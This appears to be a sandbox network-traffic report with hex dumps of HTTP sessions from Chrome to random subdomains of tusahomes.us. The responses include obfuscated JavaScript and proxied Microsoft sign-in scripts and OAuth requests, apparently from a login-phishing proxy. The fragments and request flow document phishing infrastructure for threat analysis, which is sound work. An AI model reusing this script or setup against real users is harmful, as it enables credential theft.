                                                                Data Ascii: 'getUTCMinutes']),yH=yJ(yu[vF(0x29e)]),yG=yJ(yu[vF(0x2bb)]);ym[vF(0x318)]=yN(function(){var vL=vF;return vL(0x3bd)!==yz[vL(0x1a4)](new Date(-0x2d79883d2001));})||!yN(function(){var vY=vF;yz[vY(0x1a4)](new Date(NaN));})?function(){var vx=vF;if(!yP(ya(this)
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 63 6f 6e 73 74 72 75 63 74 6f 72 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 21 30 78 30 7d 2c 7b 27 53 79 6d 62 6f 6c 27 3a 79 6a 7d 29 3b 7d 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 72 45 28 79 6c 29 3b 7d 2c 30 78 61 66 62 3a 28 79 6d 2c 79 41 2c 79 42 29 3d 3e 7b 76 61 72 20 54 50 3d 61 30 76 2c 79 4a 3d 79 42 28 30 78 35 38 31 29 3b 79 6d 5b 54 50 28 30 78 33 31 38 29 5d 3d 79 4a 28 27 64 6f 63 75 6d 65 6e 74 27 2c 27 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 27 29 3b 7d 2c 30 78 62 31 30 3a 28 79 6d 2c 79 41 2c 79 42 29 3d 3e 7b 76 61 72 20 54 53 3d 61 30 76 2c 79 4a 3d 79 42 28 30 78 31 35 63 61 29 3b 79 6d 5b 54 53 28 30 78 33 31 38 29 5d 3d 79 4a 5b 54 53 28 30 78 34 32 39 29 5d 3b 7d 2c 30 78 62 33 33 3a 28 79 6d 2c 79 41 2c 79 42 29 3d 3e
                                                                Data Ascii: constructor':!0x0,'forced':!0x0},{'Symbol':yj});}}else return rE(yl);},0xafb:(ym,yA,yB)=>{var TP=a0v,yJ=yB(0x581);ym[TP(0x318)]=yJ('document','documentElement');},0xb10:(ym,yA,yB)=>{var TS=a0v,yJ=yB(0x15ca);ym[TS(0x318)]=yJ[TS(0x429)];},0xb33:(ym,yA,yB)=>
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 61 72 20 79 4b 3d 79 56 5b 27 70 61 72 65 6e 74 57 69 6e 64 6f 77 27 5d 5b 58 43 28 30 78 34 30 30 29 5d 3b 72 65 74 75 72 6e 20 79 56 3d 6e 75 6c 6c 2c 79 4b 3b 7d 2c 79 48 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 58 52 3d 58 68 3b 69 66 28 27 51 6b 48 69 56 27 21 3d 3d 58 52 28 30 78 32 31 32 29 29 7b 74 72 79 7b 79 4a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 58 52 28 30 78 31 65 39 29 29 3b 7d 63 61 74 63 68 28 79 6f 29 7b 7d 76 61 72 20 79 56 2c 79 4b 2c 79 49 3b 79 48 3d 58 52 28 30 78 31 66 66 29 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3f 64 6f 63 75 6d 65 6e 74 5b 58 52 28 30 78 33 66 33 29 5d 26 26 79 4a 3f 79 6a 28 79 4a 29 3a 28 79 4b 3d 79 75 28 27 69 66 72 61 6d 65 27 29 2c 79 49 3d 58 52 28 30 78 32 64 38 29
                                                                Data Ascii: ar yK=yV['parentWindow'][XC(0x400)];return yV=null,yK;},yH=function(){var XR=Xh;if('QkHiV'!==XR(0x212)){try{yJ=new ActiveXObject(XR(0x1e9));}catch(yo){}var yV,yK,yI;yH=XR(0x1ff)!=typeof document?document[XR(0x3f3)]&&yJ?yj(yJ):(yK=yu('iframe'),yI=XR(0x2d8)
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 42 29 3d 3e 7b 76 61 72 20 46 34 3d 61 30 76 2c 79 4a 3d 79 42 28 30 78 32 31 61 34 29 2c 79 4e 3d 79 42 28 30 78 32 35 35 35 29 2c 79 44 3d 79 42 28 30 78 31 35 37 65 29 5b 46 34 28 30 78 33 39 65 29 5d 2c 79 63 3d 79 42 28 30 78 62 31 30 29 2c 79 50 3d 79 42 28 30 78 35 38 31 29 2c 79 53 3d 79 42 28 30 78 35 63 62 29 2c 79 75 3d 79 42 28 30 78 31 65 65 61 29 2c 79 7a 3d 79 63 26 26 79 63 5b 27 70 72 6f 74 6f 74 79 70 65 27 5d 3b 69 66 28 79 4a 28 7b 27 74 61 72 67 65 74 27 3a 46 34 28 30 78 34 32 39 29 2c 27 70 72 6f 74 6f 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 79 44 2c 27 72 65 61 6c 27 3a 21 30 78 30 7d 2c 7b 27 63 61 74 63 68 27 3a 66 75 6e 63 74 69 6f 6e 28 79 57 29 7b 76 61 72 20 46 35 3d 46 34 3b 72 65 74 75 72 6e 20 74 68 69 73 5b 46 35
                                                                Data Ascii: B)=>{var F4=a0v,yJ=yB(0x21a4),yN=yB(0x2555),yD=yB(0x157e)[F4(0x39e)],yc=yB(0xb10),yP=yB(0x581),yS=yB(0x5cb),yu=yB(0x1eea),yz=yc&&yc['prototype'];if(yJ({'target':F4(0x429),'proto':!0x0,'forced':yD,'real':!0x0},{'catch':function(yW){var F5=F4;return this[F5
                                                                2025-04-09 00:18:58 UTC16384INData Raw: 4e 3d 79 42 28 30 78 34 39 35 29 3b 79 4a 28 7b 27 74 61 72 67 65 74 27 3a 27 50 72 6f 6d 69 73 65 27 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 79 42 28 30 78 31 35 37 65 29 5b 4c 76 28 30 78 33 39 65 29 5d 7d 2c 7b 27 72 65 6a 65 63 74 27 3a 66 75 6e 63 74 69 6f 6e 28 79 44 29 7b 76 61 72 20 4c 54 3d 4c 76 2c 79 63 3d 79 4e 5b 27 66 27 5d 28 74 68 69 73 29 3b 72 65 74 75 72 6e 28 30 78 30 2c 79 63 5b 4c 54 28 30 78 33 39 66 29 5d 29 28 79 44 29 2c 79 63 5b 4c 54 28 30 78 32 63 62 29 5d 3b 7d 7d 29 3b 7d 2c 30 78 32 34 35 39 3a 28 79 6d 2c 79 41 2c 79 42 29 3d 3e 7b 79 42 28 30 78 31 35 34 33 29 2c 79 42 28 30 78 39 62 34 29 2c 79 42 28 30 78 37 36 36 29 2c 79 42 28 30 78 31 38 32 38 29 2c 79 42 28 30 78 31 65 62 33 29 3b 7d 2c 30
                                                                Data Ascii: N=yB(0x495);yJ({'target':'Promise','stat':!0x0,'forced':yB(0x157e)[Lv(0x39e)]},{'reject':function(yD){var LT=Lv,yc=yN['f'](this);return(0x0,yc[LT(0x39f)])(yD),yc[LT(0x2cb)];}});},0x2459:(ym,yA,yB)=>{yB(0x1543),yB(0x9b4),yB(0x766),yB(0x1828),yB(0x1eb3);},0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.549741137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:58 UTC690OUTGET /shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js HTTP/1.1
                                                                Host: 126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:01 UTC625INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:01 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 142581
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                last-modified: Wed, 29 Jan 2025 22:54:06 GMT
                                                                etag: "0x8DD40B7D5C9F36B"
                                                                x-ms-request-id: bce0b002-b01e-0000-67d8-77ca2c000000
                                                                x-ms-version: 2018-03-28
                                                                access-control-expose-headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                                access-control-allow-origin: *
                                                                cache-control: public, max-age=29199250
                                                                akamai-grn: 0.642d3e17.1744157940.28941fa1
                                                                2025-04-09 00:19:01 UTC15759INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                2025-04-09 00:19:01 UTC16379INData Raw: 67 68 2d 63 6f 6e 74 72 61 73 74 3a 20 61 63 74 69 76 65 29 20 7b 20 20 2e 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 2d 64 65 74 65 63 74 69 6f 6e 3a 3a 62 65 66 6f 72 65 20 7b 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 61 63 74 69 76 65 22 3b 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 20 7d 7d 40 6d 65 64 69 61 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 20 62 6c 61 63 6b 2d 6f 6e 2d 77 68 69 74 65 29 20 7b 20 20 2e 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 2d 64 65 74 65 63 74 69 6f 6e 3a 3a 62 65 66 6f 72 65 20 7b 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 77 68 69 74 65 22 3b 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 20 7d 7d 40 6d 65 64 69 61 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 20 77 68 69
                                                                Data Ascii: gh-contrast: active) { .high-contrast-detection::before { content: "active"; display: none; }}@media (-ms-high-contrast: black-on-white) { .high-contrast-detection::before { content: "white"; display: none; }}@media (-ms-high-contrast: whi
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 4e 6f 43 6f 64 65 53 65 6e 74 3a 31 30 32 32 2c 50 72 6f 6f 66 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 45 6d 70 74 79 3a 31 30 32 33 2c 50 72 6f 6f 66 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 49 6e 76 61 6c 69 64 3a 31 30 32 34 2c 54 4f 54 50 49 6e 76 61 6c 69 64 3a 31 30 32 35 2c 53 65 73 73 69 6f 6e 4e 6f 74 41 70 70 72 6f 76 65 64 3a 31 30 32 36 2c 50 68 6f 6e 65 4e 75 6d 62 65 72 49 6e 76 61 6c 69 64 3a 31 30 32 37 2c 50 68 6f 6e 65 46 6f 72 6d 61 74 74 69 6e 67 49 6e 76 61 6c 69 64 3a 31 30 32 38 2c 50 6f 6c 6c 69 6e 67 54 69 6d 65 64 4f 75 74 3a 31 30 32 39 2c 53 65 6e 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e 46 61 69 6c 65 64 3a 31 30 33 30 2c 53 65 72 76 65 72 5f 4d 65 73 73 61 67 65 4f 6e 6c 79 3a 39 39 39 39 2c 50 50 5f 45 5f 44 42 5f 4d 45 4d 42 45 52 44
                                                                Data Ascii: NoCodeSent:1022,ProofConfirmationEmpty:1023,ProofConfirmationInvalid:1024,TOTPInvalid:1025,SessionNotApproved:1026,PhoneNumberInvalid:1027,PhoneFormattingInvalid:1028,PollingTimedOut:1029,SendNotificationFailed:1030,Server_MessageOnly:9999,PP_E_DB_MEMBERD
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 63 28 74 2c 65 2c 74 68 69 73 2e 6d 62 5b 74 5d 29 2c 74 68 69 73 2e 6d 62 5b 74 5d 3d 6e 75 6c 6c 2c 2d 2d 74 68 69 73 2e 51 62 29 3a 72 2e 49 5b 74 5d 7c 7c 6e 2e 75 63 28 74 2c 65 2c 72 2e 4a 3f 7b 64 61 3a 65 7d 3a 6e 2e 24 63 28 65 29 29 2c 65 2e 4a 61 26 26 65 2e 67 64 28 29 29 7d 76 61 72 20 68 2c 67 2c 6d 2c 76 2c 62 2c 79 2c 53 3d 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 7b 7d 3b 53 2e 62 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 2e 22 29 2c 72 3d 53 2c 6f 3d 30 3b 6f 3c 6e 2e 6c 65 6e 67 74 68 2d 31 3b 6f 2b 2b 29 72 3d 72 5b 6e 5b 6f 5d 5d 3b 72 5b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 5d 3d 74 7d 2c 53 2e 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 5b 74 5d 3d 6e 7d 2c 53
                                                                Data Ascii: c(t,e,this.mb[t]),this.mb[t]=null,--this.Qb):r.I[t]||n.uc(t,e,r.J?{da:e}:n.$c(e)),e.Ja&&e.gd())}var h,g,m,v,b,y,S=void 0!==e?e:{};S.b=function(e,t){for(var n=e.split("."),r=S,o=0;o<n.length-1;o++)r=r[n[o]];r[n[n.length-1]]=t},S.L=function(e,t,n){e[t]=n},S
                                                                2025-04-09 00:19:01 UTC10680INData Raw: 3b 72 65 74 75 72 6e 20 65 26 26 53 2e 61 2e 50 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 53 2e 54 61 5b 65 5d 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 28 74 3d 72 28 74 2c 6e 29 7c 7c 74 29 7d 29 29 2c 74 7d 7d 3b 53 2e 4c 28 45 2c 22 69 6e 69 74 22 2c 45 2e 71 62 29 2c 53 2e 4c 28 45 2c 22 73 75 62 73 63 72 69 62 65 22 2c 45 2e 73 75 62 73 63 72 69 62 65 29 2c 53 2e 4c 28 45 2c 22 65 78 74 65 6e 64 22 2c 45 2e 65 78 74 65 6e 64 29 2c 53 2e 4c 28 45 2c 22 67 65 74 53 75 62 73 63 72 69 70 74 69 6f 6e 73 43 6f 75 6e 74 22 2c 45 2e 42 64 29 2c 53 2e 61 2e 42 61 26 26 53 2e 61 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 45 2c 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 2c 53 2e 54 2e
                                                                Data Ascii: ;return e&&S.a.P(e,(function(e,n){var r=S.Ta[e];"function"==typeof r&&(t=r(t,n)||t)})),t}};S.L(E,"init",E.qb),S.L(E,"subscribe",E.subscribe),S.L(E,"extend",E.extend),S.L(E,"getSubscriptionsCount",E.Bd),S.a.Ba&&S.a.setPrototypeOf(E,Function.prototype),S.T.
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 61 6c 77 61 79 73 22 7d 29 2c 6f 3d 72 2e 73 75 62 73 63 72 69 62 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 6f 2e 73 28 29 2c 74 28 65 29 29 7d 29 29 3b 72 65 74 75 72 6e 20 72 2e 6e 6f 74 69 66 79 53 75 62 73 63 72 69 62 65 72 73 28 72 2e 76 28 29 29 2c 6f 7d 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 7c 7c 74 3f 72 28 74 2e 62 69 6e 64 28 6e 29 29 3a 6e 65 77 20 50 72 6f 6d 69 73 65 28 72 29 7d 2c 53 2e 62 28 22 77 68 65 6e 22 2c 53 2e 57 64 29 2c 53 2e 77 3d 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 53 2e 61 2e 52 28 65 29 29 7b 63 61 73 65 22 6f 70 74 69 6f 6e 22 3a 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 5f 5f 6b 6f 5f 5f 68 61 73 44 6f 6d 44 61 74 61 4f 70 74
                                                                Data Ascii: always"}),o=r.subscribe((function(e){e&&(o.s(),t(e))}));return r.notifySubscribers(r.v()),o}return"function"!=typeof Promise||t?r(t.bind(n)):new Promise(r)},S.b("when",S.Wd),S.w={M:function(e){switch(S.a.R(e)){case"option":return!0===e.__ko__hasDomDataOpt
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 74 29 26 26 28 2d 31 21 3d 74 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 48 54 4d 4c 55 6e 6b 6e 6f 77 6e 45 6c 65 6d 65 6e 74 5d 22 3d 3d 22 22 2b 65 7c 7c 38 3e 3d 53 2e 61 2e 57 26 26 65 2e 74 61 67 4e 61 6d 65 3d 3d 3d 74 29 29 72 65 74 75 72 6e 20 74 7d 2c 53 2e 6a 2e 74 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 6f 29 7b 69 66 28 31 3d 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 69 3d 53 2e 6a 2e 67 65 74 43 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 46 6f 72 4e 6f 64 65 28 6e 29 3b 69 66 28 69 29 7b 69 66 28 28 74 3d 74 7c 7c 7b 7d 29 2e 63 6f 6d 70 6f 6e 65 6e 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 27 43 61 6e 6e 6f 74 20 75 73 65 20 74 68 65 20 22 63 6f 6d 70 6f 6e 65 6e 74 22 20 62 69 6e 64 69 6e 67 20
                                                                Data Ascii: t)&&(-1!=t.indexOf("-")||"[object HTMLUnknownElement]"==""+e||8>=S.a.W&&e.tagName===t))return t},S.j.tc=function(t,n,r,o){if(1===n.nodeType){var i=S.j.getComponentNameForNode(n);if(i){if((t=t||{}).component)throw Error('Cannot use the "component" binding
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 6c 61 74 65 28 6f 2c 61 2c 73 2c 75 29 29 2e 6c 65 6e 67 74 68 7c 7c 30 3c 6f 2e 6c 65 6e 67 74 68 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 6f 5b 30 5d 2e 6e 6f 64 65 54 79 70 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 65 6d 70 6c 61 74 65 20 65 6e 67 69 6e 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 6e 20 61 72 72 61 79 20 6f 66 20 44 4f 4d 20 6e 6f 64 65 73 22 29 3b 73 77 69 74 63 68 28 75 3d 21 31 2c 72 29 7b 63 61 73 65 22 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 22 3a 53 2e 68 2e 76 61 28 65 2c 6f 29 2c 75 3d 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 70 6c 61 63 65 4e 6f 64 65 22 3a 53 2e 61 2e 58 63 28 65 2c 6f 29 2c 75 3d 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 67 6e 6f 72 65 54 61 72 67 65 74 4e 6f 64 65 22 3a
                                                                Data Ascii: late(o,a,s,u)).length||0<o.length&&"number"!=typeof o[0].nodeType)throw Error("Template engine must return an array of DOM nodes");switch(u=!1,r){case"replaceChildren":S.h.va(e,o),u=!0;break;case"replaceNode":S.a.Xc(e,o),u=!0;break;case"ignoreTargetNode":
                                                                2025-04-09 00:19:01 UTC16384INData Raw: 21 31 21 3d 3d 69 2e 61 6c 6c 6f 77 43 6f 6e 74 61 63 74 50 72 6f 74 6f 63 6f 6c 73 29 63 6f 6e 74 69 6e 75 65 3b 6c 3d 70 28 6c 2c 63 2e 70 61 74 68 6e 61 6d 65 29 7d 65 6c 73 65 20 6c 3d 70 28 6c 2c 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 29 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 66 2e 69 6e 6e 65 72 54 65 78 74 3d 6c 2c 63 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 66 2c 63 29 7d 6f 3d 61 2e 69 6e 6e 65 72 48 54 4d 4c 7d 65 2e 75 74 69 6c 73 2e 73 65 74 48 74 6d 6c 28 74 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 74 3f 65 2b 22 20 28 22 2b 74 2b 22 29 22 3a 65 7d 7d 7d 2c
                                                                Data Ascii: !1!==i.allowContactProtocols)continue;l=p(l,c.pathname)}else l=p(l,c.getAttribute("href"));var f=document.createElement("span");f.innerText=l,c.parentNode.replaceChild(f,c)}o=a.innerHTML}e.utils.setHtml(t,o)}function p(e,t){return e!==t?e+" ("+t+")":e}}},
                                                                2025-04-09 00:19:01 UTC1459INData Raw: 2e 6c 6f 67 44 61 74 61 50 6f 69 6e 74 28 22 6d 73 4c 61 75 6e 63 68 55 72 69 2e 72 65 73 70 6f 6e 73 65 22 2c 6c 3f 22 74 69 6d 65 6f 75 74 22 3a 22 74 69 6d 65 6f 75 74 2d 63 6f 6e 74 69 6e 75 65 22 29 2c 73 2e 6c 6f 67 4d 65 73 73 61 67 65 28 22 22 29 3b 65 6c 73 65 7b 76 61 72 20 72 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2d 6e 3b 73 2e 6c 6f 67 44 61 74 61 50 6f 69 6e 74 28 22 6d 73 4c 61 75 6e 63 68 55 72 69 2e 66 61 69 6c 75 72 65 2e 6d 73 22 2c 72 29 2c 73 2e 6c 6f 67 4d 65 73 73 61 67 65 28 74 2b 22 20 77 61 73 20 4e 4f 54 20 69 6e 69 74 69 61 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 28 74 6f 6f 6b 20 22 2b 72 2b 22 20 6d 73 29 22 29 7d 69 66 28 22 74 69 6d 65 6f 75 74 22 21 3d 3d 65 7c 7c 6c 29 72 65 74 75 72 6e
                                                                Data Ascii: .logDataPoint("msLaunchUri.response",l?"timeout":"timeout-continue"),s.logMessage("");else{var r=(new Date).getTime()-n;s.logDataPoint("msLaunchUri.failure.ms",r),s.logMessage(t+" was NOT initiated successfully (took "+r+" ms)")}if("timeout"!==e||l)return


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.549742137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:02 UTC628OUTGET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                Sec-WebSocket-Key: DBEe3gWLH2BMsf3N57Ue8Q==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2025-04-09 00:19:04 UTC720INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:04 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: 08202605-cce2-4e4b-95aa-b7fbef8c3200
                                                                x-ms-ests-server: 2.1.20465.4 - SCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.549743137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:02 UTC2556OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fc547f1062152409fa58dda457a02be72.tusahomes.us%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638797547349731585.Njk5ZWQ4MjgtYmVjNi00YmNjLWIwMGMtOTliZDdkN2I3MWI1NWQ2NDBkNjQtMzU0ZS00NTEzLWI5ZGMtYWVlZThiOWZjMGIz&ui_locales=en-US&mkt=en-US&client-request-id=644a9def-1efe-4b57-95e5-a09549efcd10&state=OZbKZIePvfB-Sc3thpq0lQbjpVJu_h-z0KhrbWZrDntMt4L2krlZ7Iy1vtgGN0s0CTqUJMgGVUeEGaaaYr1Zr0xkpO_Es1J9b8D988Gj_qqoGmYxsf2519OXGzxSPURMPa3axoWecH_OwjF9GAftjIPNllp8ONhOP_Lz4jP84XCzwV4IuUlT6iG5JPFFh45p7Fx8_hLAnppNjdbKxrUPcggZso9nBhhN2FGHsHH2sI3JvyKgHsxVy3EBQyine9d3JCCZCQUa6NrvtFX4-0GN2Q&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0&sso_reload=true HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: 